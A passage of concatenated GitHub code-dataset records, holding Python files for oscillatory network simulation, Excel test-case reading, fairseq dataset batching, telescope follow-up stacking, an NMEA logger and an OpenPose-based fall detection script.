and previous steps.\r\n \r\n @return (list) Dynamic of oscillatory network. If argument 'collect_dynamic' = True, than return dynamic for the whole simulation time,\r\n otherwise returns only last values (last step of simulation) of dynamic.\r\n \r\n @see simulate()\r\n @see simulate_static()\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n return wrapper.simulate_dynamic_sync_network(self._ccore_network_pointer, order, solution, collect_dynamic, step, int_step, threshold_changes);\r\n \r\n # For statistics and integration\r\n time_counter = 0;\r\n \r\n # Prevent infinite loop. It's possible when required state cannot be reached.\r\n previous_order = 0;\r\n current_order = self.sync_local_order();\r\n \r\n # If requested input dynamics\r\n dyn_phase = [];\r\n dyn_time = [];\r\n if (collect_dynamic == True):\r\n dyn_phase.append(self._phases);\r\n dyn_time.append(0);\r\n \r\n # Execute until sync state will be reached\r\n while (current_order < order): \r\n # update states of oscillators\r\n self._phases = self._calculate_phases(solution, time_counter, step, int_step);\r\n \r\n # update time\r\n time_counter += step;\r\n \r\n # if requested input dynamic\r\n if (collect_dynamic == True):\r\n dyn_phase.append(self._phases);\r\n dyn_time.append(time_counter);\r\n else:\r\n dyn_phase = self._phases;\r\n dyn_time = time_counter;\r\n \r\n # update orders\r\n previous_order = current_order;\r\n current_order = self.sync_local_order();\r\n \r\n # hang prevention\r\n if (abs(current_order - previous_order) < threshold_changes):\r\n print(\"Warning: sync_network::simulate_dynamic - simulation is aborted due to low level of convergence rate (order = \" + str(current_order) + \").\");\r\n break;\r\n \r\n return (dyn_time, dyn_phase);\r\n\r\n\r\n def simulate_static(self, steps, time, solution = solve_type.FAST, collect_dynamic = False):\r\n \"\"\"!\r\n @brief Performs static simulation of oscillatory network.\r\n \r\n @param[in] steps (uint): Number steps of simulations during simulation.\r\n @param[in] time (double): Time of simulation.\r\n @param[in] solution (solve_type): Type of solution.\r\n @param[in] collect_dynamic (bool): If True - returns whole dynamic of oscillatory network, otherwise returns only last values of dynamics.\r\n \r\n @return (list) Dynamic of oscillatory network. If argument 'collect_dynamic' = True, than return dynamic for the whole simulation time,\r\n otherwise returns only last values (last step of simulation) of dynamic.\r\n \r\n @see simulate()\r\n @see simulate_dynamic()\r\n \r\n \"\"\"\r\n \r\n if (self._ccore_network_pointer is not None):\r\n return wrapper.simulate_sync_network(self._ccore_network_pointer, steps, time, solution, collect_dynamic);\r\n \r\n dyn_phase = None;\r\n dyn_time = None;\r\n \r\n if (collect_dynamic == True):\r\n dyn_phase = [];\r\n dyn_time = [];\r\n \r\n dyn_phase.append(self._phases);\r\n dyn_time.append(0);\r\n \r\n step = time / steps;\r\n int_step = step / 10.0;\r\n \r\n for t in numpy.arange(step, time + step, step):\r\n # update states of oscillators\r\n self._phases = self._calculate_phases(solution, t, step, int_step);\r\n \r\n # update states of oscillators\r\n if (collect_dynamic == True):\r\n dyn_phase.append(self._phases);\r\n dyn_time.append(t);\r\n else:\r\n dyn_phase = self._phases;\r\n dyn_time = t;\r\n \r\n return (dyn_time, dyn_phase); \r\n\r\n\r\n def _calculate_phases(self, solution, t, step, int_step):\r\n \"\"\"!\r\n @brief Calculates new phases for oscillators in the network in line with current step.\r\n \r\n @param[in] solution (solve_type): Type solver of the differential equation.\r\n @param[in] t (double): Time of simulation.\r\n @param[in] step (double): Step of solution at the end of which states of oscillators should be calculated.\r\n @param[in] int_step (double): Step differentiation that is used for solving differential equation.\r\n \r\n @return (list) New states (phases) for oscillators.\r\n \r\n \"\"\"\r\n \r\n next_phases = [0] * self.num_osc; # new oscillator _phases\r\n \r\n for index in range (0, self.num_osc, 1):\r\n if (solution == solve_type.FAST):\r\n result = self._phases[index] + self._phase_kuramoto(self._phases[index], 0, index);\r\n next_phases[index] = self._phase_normalization(result);\r\n \r\n elif (solution == solve_type.RK4):\r\n result = odeint(self._phase_kuramoto, self._phases[index], numpy.arange(t - step, t, int_step), (index , ));\r\n next_phases[index] = self._phase_normalization(result[len(result) - 1][0]);\r\n \r\n else:\r\n raise NameError(\"Solver '\" + solution + \"' is not supported\");\r\n \r\n return next_phases;\r\n \r\n\r\n def _phase_normalization(self, teta):\r\n \"\"\"!\r\n @brief Normalization of phase of oscillator that should be placed between [0; 2 * pi].\r\n \r\n @param[in] teta (double): phase of oscillator.\r\n \r\n @return (double) Normalized phase.\r\n \r\n \"\"\"\r\n \r\n norm_teta = teta;\r\n while (norm_teta > (2.0 * pi)) or (norm_teta < 0):\r\n if (norm_teta > (2.0 * pi)):\r\n norm_teta -= 2.0 * pi;\r\n else:\r\n norm_teta += 2.0 * pi;\r\n \r\n return norm_teta;\r\n","repo_name":"Khoirotunnisa07/pyclustering","sub_path":"pyclustering/nnet/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":16916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"33607892483","text":"IK = 'IK'\nCHUY = 'CH'\nNARYN = 'NR'\nTALAS = 'TS'\nOSH = 'OS'\nJALAL = 'JL'\nBATKEN = 'BT'\n\nOBLAST_CHOICES = (\n (IK, 'Иссык-Кульская область'),\n (CHUY, 'Чуйская область'),\n (NARYN, 'Нарынская область'),\n (TALAS, 'Таласская область'),\n (OSH, 'Ошская область'),\n (JALAL, 'Джалал-Абадская область'),\n (BATKEN, 'Баткенская область'),\n)\n","repo_name":"edzen12/min_crm","sub_path":"backend/crm/apps/branches/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69977566187","text":"import os\nimport json\nimport openpyxl\nfrom filelock import FileLock\nfrom common.constant import Constant\nfrom common.logger import logger\n\nif not os.path.exists(Constant.EXCEL_DIR):\n os.mkdir(Constant.EXCEL_DIR)\n\n\nclass CasesData:\n\n def __init__(self, attrs):\n for t in attrs:\n try:\n setattr(self, t[0], t[1])\n except TypeError:\n continue\n\n def __str__(self):\n return getattr(self, \"title\", super().__str__())\n\n def __repr__(self):\n return getattr(self, \"title\", super().__repr__())\n\n def __setattr__(self, key, value):\n try:\n value = json.loads(value)\n except (json.decoder.JSONDecodeError, TypeError):\n try:\n if \"[\" in value and \"]\" in value:\n value = eval(value)\n except (SyntaxError, TypeError):\n pass\n finally:\n super().__setattr__(key, value)\n\n\nclass ReadExcel:\n\n def __init__(self, file_path, *sheet_name):\n \"\"\"\n\n :param file_path: 文件地址 -> str\n :param sheet_name: 工作表名字 -> str\n \"\"\"\n self.file_path = file_path\n self.sheet_name = sheet_name\n self.wb = None\n self.sheet = dict()\n self.data = dict()\n\n def __open(self):\n # 创建操纵excel的实例\n with FileLock(self.file_path + \".lock\", timeout=30):\n self.wb = openpyxl.load_workbook(self.file_path)\n for sheet in self.sheet_name:\n try:\n self.sheet.setdefault(sheet, self.wb[sheet])\n except KeyError as e:\n logger.error(f\"The sheet: [{sheet}] does not exist. Track:{e}\")\n raise e\n self.wb.close()\n logger.info(\"Workbook: {}, Sheet: {}\".format(self.file_path, self.sheet_name))\n\n def read_obj(self):\n self.__open()\n for k, y in self.sheet.items():\n data = self._read_excel_obj(y)\n self.data.setdefault(k, data)\n return self.data\n\n def read_dict(self):\n self.__open()\n data = dict()\n for k, y in self.sheet.items():\n dic = self._read_excel_dict(y)\n data.setdefault(k, dic)\n return data\n\n @staticmethod\n def _read_excel_dict(sheet) -> list:\n \"\"\"\n 方法一: 将每条数据以dict的形式储存于list中\n :param sheet:\n :return: 以列表形式存储的case_data -> list\n \"\"\"\n # 获取首行数据,得到title并存于list\n title = []\n for i in sheet[1]:\n title.append(i.value)\n # 获取每一行的数据并与title组成dict\n case_data = []\n if sheet.max_row >= 3:\n for r in sheet[2:sheet.max_row]:\n case_list = []\n for va in r:\n case_list.append(va.value)\n case_data.append(zip(title, case_list))\n else:\n data = [i.value for i in sheet[2:sheet.max_row]]\n case_data.append(zip(title, data))\n return case_data\n\n @staticmethod\n def _read_excel_obj(sheet_obj, *list_column) -> list:\n \"\"\"\n 自定义选择需要读取的column, 若未传则默认返回全部\n :param sheet_obj:\n :param list_column: 不定长参数, 需要读取的column(int) -> tuple\n :return: list中存着对象,对象中有实例属性 -> list\n \"\"\"\n title = []\n if not list_column: # 未传参时默认为获取全部\n for i in sheet_obj[1]:\n title.append(i.value)\n obj_data = []\n if sheet_obj.max_row >= 3:\n for r in sheet_obj[2:sheet_obj.max_row]:\n case_list = []\n for va in r:\n case_list.append(va.value)\n attr = CasesData(zip(title, case_list))\n if getattr(attr, \"id\", None):\n obj_data.append(attr)\n else:\n logger.warning(f\"Invalid data exists in sheet:[{sheet_obj.title}],\"\n f\"The value of coordinate:[{r[0].coordinate}] is value:[{r[0].value}] \")\n else:\n data = [i.value for i in sheet_obj[2:sheet_obj.max_row]]\n attr = CasesData(zip(title, data))\n if getattr(attr, \"id\", None):\n obj_data.append(attr)\n\n else: # 指定column\n if sheet_obj.max_column < max(list_column):\n raise ValueError(\"Column out of range\")\n data = list(sheet_obj.rows)\n for c in list_column:\n title.append(data[0][c - 1].value)\n obj_data = []\n for i in data[1:]:\n case_list = []\n for y in list_column:\n x = y - 1\n case_list.append(i[x].value)\n attr = CasesData(zip(title, case_list))\n obj_data.append(attr)\n return obj_data\n\n def write_data(self, sheet, *args) -> None:\n \"\"\"\n 写入excel\n :param sheet:\n :param args: 支持单个/多个单元格写入 Example: [{\"row\": int, \"column\": int, \"msg\": data}, ]\n :return:\n \"\"\"\n\n def write(sheet, **kwargs):\n row = kwargs['row']\n column = kwargs['column']\n msg = kwargs['msg']\n try:\n logger.info(\"Excel write to data! row: {}, column: {}, value: {}\".format(row, column, msg))\n sheet.cell(row=row, column=column, value=msg)\n except Exception as e:\n logger.error(\"Excel Write data function is error: {}\".format(e))\n\n wb = openpyxl.load_workbook(self.file_path)\n sheet = wb[sheet]\n for i in args:\n write(sheet, **i)\n wb.save(self.file_path)\n wb.close()\n\n\nif __name__ == '__main__':\n # obj = ReadExcel(Constant.EXCEL_DIR + \"/cases.xlsx\", \"smoke2\", \"smoke3\", \"smoke4\", \"smoke5\", \"smoke6\", \"smoke7\",\n # \"smoke8\", \"smoke9\", \"smoke10\", \"smoke11\", \"smoke12\", \"smoke13\", \"smoke14\", \"smoke15\",\n # \"smoke16\", \"smoke17\")\n excel = ReadExcel(Constant.EXCEL_DIR + \"/cases.xlsx\", \"init1\")\n obj = excel.read_obj()\n dic = excel.read_dict()\n print(obj)\n print(list(dic))\n","repo_name":"fungaegis/api-automatic-framework","sub_path":"common/read_excel.py","file_name":"read_excel.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"21897943130","text":"import pandas as pd\nfrom datetime import datetime\n\n#df = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/finance-charts-apple.csv')\ndf = pd.read_csv('chart1.csv')\n#df['DateTime'] = df['Date'] + \" \" + df['Time']\nprint(df)\ndf['DateTime'] = datetime.strptime(df['Date'] + \" \" + df['Time'], \"%m/%d/%Y %H:%M\")\n\nimport plotly.graph_objects as go\nfig = go.Figure(data=[go.Candlestick(x=df['DateTime'],\n open=df['Open'],\n high=df['High'],\n low=df['Low'],\n close=df['Close'])])\n\nfig.show()\n","repo_name":"karlfe/trading","sub_path":"chart/csv2chart.py","file_name":"csv2chart.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38735594632","text":"from fairseq.data import SampledMultiEpochDataset\nimport cytoolz as toolz\nimport more_itertools\n\n\nclass BatchedSampledMultiEpochDataset(SampledMultiEpochDataset):\n \"\"\"\n The only difference compared with SampledMultiEpochDataset is\n batch size. This dataset will only group data from one dataset\n to one batch.\n \"\"\"\n\n def _group_indices_by_dataset_index(self, indices):\n return toolz.groupby(lambda x: self._get_dataset_and_index(x)[0], indices)\n\n def batch_by_size(self, indices, max_tokens=None, max_sentences=None, required_batch_size_multiple=1):\n batches = []\n for _, grouped_indices in self._group_indices_by_dataset_index(indices).items():\n # Group indices by the dataset.\n batches.append(\n super().batch_by_size(grouped_indices, max_tokens, max_sentences, required_batch_size_multiple)\n )\n return list(more_itertools.flatten(batches))\n\n def collater(self, samples, **extra_args):\n if len(samples) == 0:\n return None\n # Add language to the batch\n batch = super().collater(samples, **extra_args)\n assert len(set(sample[0] for sample in samples)) == 1\n key = self.keys[samples[0][0]]\n # The format of key {data_category}:{src}-{tgt}\n src_lang, tgt_lang = key.split(\":\")[1].strip().split(\"-\")\n batch[\"src_lang\"] = src_lang\n batch[\"tgt_lang\"] = tgt_lang\n return batch\n","repo_name":"NLP-Playground/LaSS","sub_path":"fairseq_code/datasets/batched_sampled_multi_epoch_dataset.py","file_name":"batched_sampled_multi_epoch_dataset.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"780555497","text":"__all__ = (\"find_telescopes\", \"NFollowStacker\")\n\n\nimport numpy as np\n\nfrom .base_stacker import BaseStacker\nfrom .coord_stackers import ra_dec2_alt_az\n\n\ndef find_telescopes(min_size=3.0):\n \"\"\"Finds telescopes larger than min_size, from list of large telescopes based on\n http://astro.nineplanets.org/bigeyes.html.\n\n Returns\n -------\n np.recarray\n Array of large telescopes with columns [aperture, name, lat, lon].\n \"\"\"\n # Aperture Name Location http://astro.nineplanets.org/bigeyes.html\n telescopes = [\n [10.4, \"Gran Canarias\", \"La Palma\"],\n [10.0, \"Keck\", \"Mauna Kea\"],\n [10.0, \"Keck II\", \"Mauna Kea\"],\n [9.2, \"SALT\", \"South African Astronomical Observatory\"],\n [9.2, \"Hobby-Eberly\", \"Mt. Fowlkes\"],\n [8.4, \"Large Binocular Telescope\", \"Mt. Graham\"],\n [8.3, \"Subaru\", \"Mauna Kea\"],\n [8.2, \"Antu\", \"Cerro Paranal\"],\n [8.2, \"Kueyen\", \"Cerro Paranal\"],\n [8.2, \"Melipal\", \"Cerro Paranal\"],\n [8.2, \"Yepun\", \"Cerro Paranal\"],\n [8.1, \"Gemini North\", \"Mauna Kea\"],\n [8.1, \"Gemini South\", \"Cerro Pachon\"],\n [6.5, \"MMT\", \"Mt. Hopkins\"],\n [6.5, \"Walter Baade\", \"La Serena\"],\n [6.5, \"Landon Clay\", \"La Serena\"],\n [6.0, \"Bolshoi Teleskop Azimutalnyi\", \"Nizhny Arkhyz\"],\n [6.0, \"LZT\", \"British Columbia\"],\n [5.0, \"Hale\", \"Palomar Mountain\"],\n [4.3, \"Dicovery Channel\", \"Lowell Observatory\"],\n [4.2, \"William Herschel\", \"La Palma\"],\n [4.2, \"SOAR\", \"Cerro Pachon\"],\n [4.2, \"LAMOST\", \"Xinglong Station\"],\n [4.0, \"Victor Blanco\", \"Cerro Tololo\"],\n [4.0, \"Vista\", \"Cerro Paranal\"],\n [3.9, \"Anglo-Australian\", \"Coonabarabran\"],\n [3.8, \"Mayall\", \"Kitt Peak\"],\n [3.8, \"UKIRT\", \"Mauna Kea\"],\n [3.6, \"360\", \"Cerro La Silla\"],\n [3.6, \"Canada-France-Hawaii\", \"Mauna Kea\"],\n [3.6, \"Telescopio Nazionale Galileo\", \"La Palma\"],\n [3.5, \"MPI-CAHA\", \"Calar Alto\"],\n [3.5, \"New Technology\", \"Cerro La Silla\"],\n [3.5, \"ARC\", \"Apache Point\"],\n [3.5, \"WIYN\", \"Kitt Peak\"],\n [3.0, \"Shane\", \"Mount Hamilton\"],\n [3.0, \"NASA IRTF\", \"Mauna Kea\"],\n ]\n\n scopes = np.zeros(\n len(telescopes),\n dtype=list(zip([\"aperture\", \"name\", \"lat\", \"lon\"], [float, (np.str_, 38), float, float])),\n )\n\n # name, lat (S negative), lon (W negative)\n observatories = [\n [\"Cerro Paranal\", -24, 38, -70, 24],\n [\"Nizhny Arkhyz\", 43, 39, 41, 26],\n [\"Cerro La Silla\", -29, 15, -70, 44],\n [\"Lowell Observatory\", 35, 12, -111, 40],\n [\"Apache Point\", 32, 47, -105, 49],\n [\"Mount Hamilton\", 37, 21, -121, 38],\n [\"South African Astronomical Observatory\", -32, 23, 20, 49],\n [\"Cerro Pachon\", -30, 20, -70, 59],\n [\"Coonabarabran\", -31, 17, 149, 0o4],\n [\"Mt. Fowlkes\", 30, 40, -104, 1],\n [\"La Palma\", 28, 46, -17, 53],\n [\"Mt. Graham\", 32, 42, -109, 53],\n [\"Calar Alto\", 37, 13, -2, 33],\n [\"British Columbia\", 49, 17, -122, 34],\n [\"Kitt Peak\", 31, 57, -111, 37],\n [\"La Serena\", -30, 10, -70, 48],\n [\"Palomar Mountain\", 33, 21, -116, 52],\n [\"Xinglong Station\", 40, 23, 105, 50],\n [\"Mt. Hopkins\", 31, 41, -110, 53],\n [\"Cerro Tololo\", -30, 10, -70, 49],\n [\"Mauna Kea\", 19, 50, -155, 28],\n ]\n\n # Make a nice little dict to look up the observatory positions\n obs = {}\n for i, ob in enumerate(observatories):\n obs[ob[0]] = [\n (np.abs(ob[1]) + ob[2] / 60.0) * (ob[1] / np.abs(ob[1])),\n (np.abs(ob[3]) + ob[4] / 60.0) * (ob[3] / np.abs(ob[3])),\n ]\n\n for i, telescope in enumerate(telescopes):\n scopes[\"aperture\"][i] = telescope[0]\n scopes[\"name\"][i] = telescope[1]\n scopes[\"lat\"][i], scopes[\"lon\"][i] = obs[telescope[2]]\n\n scopes = scopes[np.where(scopes[\"aperture\"] >= min_size)]\n return scopes\n\n\nclass NFollowStacker(BaseStacker):\n \"\"\"Add the number of telescopes ('nObservatories') that could follow up any visit\n at (any of the) times in timeStep, specifying the minimum telescope size (in meters) and airmass limit.\n\n Parameters\n ----------\n minSize: float, optional\n The minimum telescope aperture to use, in meters. Default 3.0.\n airmass_limit: float, optional\n The maximum airmass allowable at the follow-up observatory. Default 2.5.\n time_steps: np.array or list of floats, optional\n The timesteps to check for followup opportunities, in hours. Default is np.arange(0.5, 12., 3.0).\n mjd_col: str, optional\n The exposure MJD column name. Default 'observationStartMJD'.\n ra_col: str, optional\n The RA column name. Default 'fieldRA'.\n dec_col: str, optional\n The Dec column name. Default 'fieldDec'.\n raDecDeg: bool, optional\n Flag whether RA/Dec are in degrees (True) or radians (False).\n \"\"\"\n\n cols_added = [\"nObservatories\"]\n\n def __init__(\n self,\n min_size=3.0,\n airmass_limit=2.5,\n time_steps=np.arange(0.5, 12.0, 3.0),\n mjd_col=\"observationStartMJD\",\n ra_col=\"fieldRA\",\n dec_col=\"fieldDec\",\n degrees=True,\n ):\n self.mjd_col = mjd_col\n self.ra_col = ra_col\n self.dec_col = dec_col\n self.degrees = degrees\n self.cols_added_dtypes = [int]\n self.cols_req = [self.mjd_col, self.ra_col, self.dec_col]\n self.units = [\"#\"]\n self.airmass_limit = airmass_limit\n self.time_steps = time_steps\n self.telescopes = find_telescopes(min_size=min_size)\n\n def _run(self, sim_data, cols_present=False):\n if cols_present:\n return sim_data\n sim_data[\"nObservatories\"] = 0\n if self.degrees:\n ra = np.radians(sim_data[self.ra_col])\n dec = np.radians(sim_data[self.dec_col])\n else:\n ra = sim_data[self.ra_col]\n dec = sim_data[self.dec_col]\n for obs in self.telescopes:\n obs_got_it = np.zeros(len(sim_data[self.ra_col]), int)\n obs_lon = np.radians(obs[\"lon\"])\n obs_lat = np.radians(obs[\"lat\"])\n for step in self.time_steps:\n alt, az = ra_dec2_alt_az(\n ra,\n dec,\n obs_lon,\n obs_lat,\n sim_data[self.mjd_col] + step / 24.0,\n altonly=True,\n )\n airmass = 1.0 / (np.cos(np.pi / 2.0 - alt))\n followed = np.where((airmass <= self.airmass_limit) & (airmass >= 1.0))\n # If the observatory got an observation, save this into obs_got_it.\n # obs_got_it will be 1 if ANY of the times got an observation.\n obs_got_it[followed] = 1\n # If an observatory got an observation, count it in nObservatories.\n sim_data[\"nObservatories\"] += obs_got_it\n return sim_data\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/maf/stackers/n_follow_stacker.py","file_name":"n_follow_stacker.py","file_ext":"py","file_size_in_byte":6997,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"6800011471","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 5 18:50:30 2021\n\n@author: wmorland\n\"\"\"\n\nimport sys\nimport logging\nimport nmea\n\n\nnmea.zip_logs()\nnmea.send_to_drive()\n\ncan0 = nmea.start_can_bus()\nif can0 is None:\n logging.error('Oops.')\n sys.exit(-1)\n\ngps_time = nmea.get_gps_time(can0)\nlog_file = gps_time.strftime('%Y%m%d-%H:%M:%S-Log.n2k')\n\nnmea.set_filters(can0)\n\n# start logging in an infinite loop until there is an interupt\n\n# on interupt\n\nnmea.stop_can_bus()\nnmea.zip_logs()\nnmea.send_to_drive()\n\n# check that the log file was successfully send to Google drive then delete it\n\nsys.exit(0)\n","repo_name":"Bill374/2000-sail-polars","sub_path":"Logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19912610312","text":"l_t = ['в', '5', 'часов', '17', 'минут', 'температура', 'воздуха', 'была', '+5', 'градусов']\n\ni = 0\n\nwhile i < len(l_t):\n if l_t[i].isnumeric():\n l_t[i] = '\"' + l_t[i].zfill(2) + '\"'\n elif l_t[i].startswith('+'):\n l_t[i] = '\"' + l_t[i].zfill(3) + '\"'\n i += 1\nl_t = ''.join(l_t)\n\nprint(l_t)\n","repo_name":"Amor2302/lesson_3","sub_path":"lesson_2/2.2.py","file_name":"2.2.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41666282447","text":"import argparse\nimport logging\nimport sys\nimport time\nimport math\nimport cv2\nimport numpy as np\nimport pyopenpose as op\nimport pickle\n\ndef posture_square(poseKeypoints,accuracy_threshold):\n length=np.size(poseKeypoints,0)\n width=np.size(poseKeypoints,1)\n x_max=-10000\n x_min=10000\n y_max=-10000\n y_min=10000\n detected_corrected_rate=0\n not_zero_components=length\n for i in range(length):\n if poseKeypoints[i,2]==0:\n not_zero_components=not_zero_components-1\n continue\n detected_corrected_rate=detected_corrected_rate+poseKeypoints[i,2]\n if poseKeypoints[i,width-1]>=accuracy_threshold: # Only counts in guaranteed points\n if poseKeypoints[i,0]>=x_max:\n x_max=poseKeypoints[i,0]\n if poseKeypoints[i,0]<=x_min:\n x_min=poseKeypoints[i,0]\n if poseKeypoints[i,1]>=y_max:\n y_max=poseKeypoints[i,1]\n if poseKeypoints[i,1]<=y_min:\n y_min=poseKeypoints[i,1]\n x_range=x_max-x_min\n y_range=y_max-y_min\n average_detected_corrected_rate=detected_corrected_rate/not_zero_components\n return (x_range,y_range,average_detected_corrected_rate)\n\n\ndef fifo_append(user_array,value):\n length=np.size(user_array,1)\n full_or_not=False # Whether the fifo_buff is full or not\n insert_head_velocity=0.0\n average_head_velocity=0.0\n if value[0,2]<0.3: # if the head keypoint is not detected, or strangely shift. Do not do anything to the user_array, just return the last results Nov_24\n if user_array[0,0]!=0 and user_array[0,1]!=0:\n full_or_not=True\n insert_head_velocity=(user_array[1,length-1]-user_array[1,length-2]) # ATTEMPT 1: Only calculate y-axis velocity\n average_head_velocity=(user_array[1,length-1]-user_array[1,0])/7\n return [user_array, full_or_not, insert_head_velocity, average_head_velocity] # Do not insert a not sure point into the array\n for i in range(length-1):\n user_array[0,i]=user_array[0,i+1]\n user_array[1,i]=user_array[1,i+1]\n user_array[0,length-1]=value[0,0]\n user_array[1,length-1]=value[0,1]\n if user_array[0,0]!=0 and user_array[0,1]!=0: # At this stage the fifo_buff is full\n insert_head_velocity=(user_array[1,length-1]-user_array[1,length-2]) # ATTEMPT 1: Only calculate y-axis velocity\n average_head_velocity=(user_array[1,length-1]-user_array[1,0])/7\n full_or_not=True\n # print(head_monitor)\n # print(full_or_not)\n # print(insert_head_velocity)\n # print(average_head_velocity)\n\n return [user_array, full_or_not, insert_head_velocity, average_head_velocity]\n\ndef body_tilt_detection(human_keypoints):\n \n center_line_angel=math.pi/2 # default 90 degree\n points_are_accurate=True\n\n head_position=np.zeros([1,3],dtype=float)\n hip_center_position=np.zeros([1,3],dtype=float)\n for i in range(np.size(head_position,1)):\n head_position[0,i]=human_keypoints[0,i] # Position and accuracy of head point\n hip_center_position[0,i]=human_keypoints[8,i] # Position and accuracy of hip center point\n if head_position[0,2]<0.2 or hip_center_position[0,2]<0.2:\n # We deem that these two points are not reliable\n points_are_accurate=False\n center_line_angel=math.pi/2\n return [center_line_angel,points_are_accurate] \n y_distance=abs(head_position[0,1]-hip_center_position[0,1]) # y_distance\n x_distance=abs(head_position[0,0]-hip_center_position[0,0]) # x_distance\n if x_distance<10:\n x_distance=10\n center_line_angel=math.atan(y_distance/x_distance)\n return [center_line_angel, points_are_accurate]\n\nlogger = logging.getLogger('TfPoseEstimatorRun')\nlogger.handlers.clear()\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\nif __name__ == '__main__':\n fps_time = 0\n # Create a fifo buffer to store head position\n head_keypoint=np.zeros([1,3],dtype=float)\n head_history=np.zeros([2,7],dtype=float) # Since the position of a dot is represented by x and y\n\n params = dict()\n params[\"model_folder\"] = \"../../models/\"\n params[\"net_resolution\"] = \"960x720\" \n\n # Starting OpenPose\n opWrapper = op.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n\n print(\"OpenPose start\")\n cap = cv2.VideoCapture('/home/ad/openpose_v2_with_api/examples/tutorial_api_python/video_collection/output_new4.avi')\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, 960)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)\n\n #fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v') # Set the format of outputed video\n #fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G') # Set the format of outputed video\n #out_video = cv2.VideoWriter('/home/ad/openpose_v2_with_api/examples/tutorial_api_python/video_collection/analyze.avi', fourcc, cap.get(cv2.CAP_PROP_FPS), (960,720))\n frame_width = int( cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n frame_height =int( cap.get( cv2.CAP_PROP_FRAME_HEIGHT))\n print(frame_height)\n print(frame_width)\n #out_video = cv2.VideoWriter('/home/ad/openpose_v2_with_api/examples/tutorial_api_python/video_collection/outpy.avi',cv2.VideoWriter_fourcc('M','J','P','G'), cap.get(cv2.CAP_PROP_FPS), (frame_height,frame_width))\n \n # STORE RESULT VIDEO NOV_24\n pathOut = '/home/ad/openpose_v2_with_api/examples/tutorial_api_python/video_collection/experiment_results/output_new4.avi'\n fps = 2\n size = (960,720)\n out = cv2.VideoWriter(pathOut,cv2.VideoWriter_fourcc(*'DIVX'), fps, size) # If you do not want to save the test result, comment all the \"out\" object\n\n\n\n\n # HEAD monitor\n head_monitor=np.zeros([2,7],dtype=float)\n # velocity threshold for fall detection!!!\n ave_velocity_threshold=20 #12\n # BODY TILT settings\n fall_angle_threshold=math.pi/6\n\n # FALL HAPPENS!\n fall_happen=False\n\n # Record the falling period (picture xxxx - xxxx is falling)\n picture_id=0\n # Record the picture_id when fall happens\n fall_happen_picture_id=np.array([],dtype=int)\n append_copy=np.zeros([1,1],dtype=int)\n\n while (cap.isOpened()):\n\n #ret_val, dst_before_rotae = cap.read()\n ret_val, dst = cap.read()\n #dst=cv2.rotate(dst_before_rotae,cv2.ROTATE_180)\n dst = cv2.resize(dst,(960,720),fx=0,fy=0, interpolation = cv2.INTER_CUBIC)\n if ret_val == False:\n print(\"Camera read Error\")\n break\n picture_id+=1\n print('current picture is ', picture_id)\n datum = op.Datum()\n datum.cvInputData = dst # Input the captured data into the openpose datum\n opWrapper.emplaceAndPop([datum]) # Analyzing Datum\n fps = 1.0 / (time.time() - fps_time)# After succsessful analyze, calculate the fps\n fps_time = time.time()\n newImage = datum.cvOutputData[:, :, :] # This is the analyze result from openpose\n cv2.putText(newImage , \"FPS: %f\" % (fps), (20, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 0), 2) # Printout the just calculated FPS information\n if fall_happen==True:\n cv2.putText(newImage,\"FALL HAPPENS\",(360, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2)\n \n if np.size(datum.poseKeypoints)!=1:\n # Print out the total number of detected person\n human_count = 0\n # remove noise posture in detection\n accuracy_threshold=0.3 \n x_range_threshold=100 \n y_range_threshold=100 \n average_accuracy_rate=0\n human_id_in_keypoints=1e6\n\n\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n for i in range(np.size(datum.poseKeypoints,0)):\n for j in range(25): # first target: print keypoints in picture\n cv2.putText(newImage,str(j), ( int(datum.poseKeypoints[i][j][0]) + 10, int(datum.poseKeypoints[i][j][1])), font, 0.5, (0,255,0), 2) \n #print(datum.poseKeypoints[i])\n # second target: remove noise posture in detecting human\n x_range,y_range, average_accuracy_rate=posture_square(datum.poseKeypoints[i],accuracy_threshold)\n \n if x_range<=x_range_threshold and y_range<=y_range_threshold: # IT PROVES THAT IT IS NOT!!! HUMAN\n continue\n if average_accuracy_rate>=0.3:\n human_id_in_keypoints=i\n human_count+=1\n cv2.putText(newImage,\"Person number: %i\" % (human_count),(20, 680), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,0),2)\n\n if human_id_in_keypoints!= 1e6: # If human_id_in_keypoints is 